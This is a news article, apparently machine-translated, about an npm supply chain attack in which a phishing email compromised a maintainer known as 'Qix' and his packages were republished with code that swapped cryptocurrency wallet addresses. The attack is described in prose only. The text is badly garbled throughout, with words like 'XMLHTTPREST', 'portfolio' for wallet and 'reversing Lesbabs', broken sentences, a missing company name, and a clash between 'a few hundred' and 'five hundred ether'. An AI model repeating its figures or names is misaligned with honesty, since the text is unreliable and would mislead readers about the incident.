A phishing email removed one of the most prolific developers of Node on Monday. JS by pushing the malicious code in downloaded packages billions of times a week, in what researchers call the largest software supply chain attack in recent times.
Although the scope of the attack is massive, Security Alliance said in a Tuesday report that the attacker left with barely a few hundred. However, security teams are now faced with the substantial cost of updating Backend systems to counter other attacks.
A very popular maintainer whose work (like Chalk and Debug-Js) is used in billions of downloads each week, known as “Qix”, library manager such as Chalk and Debug-Js, was compromised last week after receiving a support email @ npmjs[.]help. The domain once indicated a Russian server and redirected to a two -factory authentication page hosted on the Bunnycdn content delivery network.
The identification thief harvested the username, password and 2FA codes before sending them to a remote host. With full access, the attacker republished each Qix package with a crypto -focused payload.
NODE Package Manager (shortcut in NPM, not NPM) is like an application shop for developers and is the place where the coders download small blocks of code of code code (called packages) Instead of writing everything from scratch. A manager is the person or entity who creates and updates these packages.
How the attack occurred
The code injected was simple. It checked if Window.ethereum was present and, in the affirmative, connected to the basic transaction functions of Ethereum. The calls to approve, allow, transfer or transfer have been relaunched in silence to a single portfolio, “0xFC4A4858BAFEF54D1B1D7697BFB5C52F4C166976.”
Any Ethereum transaction with value and no data was also redirected. For Solana, malicious software has crushed the recipients with a non -valid chain starting “1911 …”, breaking the transfers.
Network requests have also been intercepted.
By diverting recovery and XMLHTTPREST, malicious software scanned the JSON responses for sub-chants resembling wallet addresses and replaced them with one of the 280 alternatives coded hard to appear misleading similar.
Impact of the attack
But for the entire distribution, the impact was negligible.
The data on the chain show that the attacker received only about five hundred ether and about $ 20 from an illiquid same which exchanged less than $ 600 in volume, according to the security alliance report.
The Popular Metamask Popular browser portfolio also said on X that it was not affected by the NPM supply chain attack while the portfolio locks its code versions, uses manual and automated checks and publishes updates in stages. He also uses “Lavamoat”, which blocks the malicious code even if it is inserted and “blockAid”, which quickly signals compromise wallet addresses, to keep such distant attacks.
Meanwhile, CTO Charles Guillemet warned that the malicious code had been pushed into packages with more than a billion downloads and was designed to silently replace the addresses of the portfolio in transactions.
The attack follows another case reported last week by reversing Lesbabs, where NPM packages used Ethereum smart contracts to hide malware – a technique that disguised command and control traffic as ordinary blockchain calls.
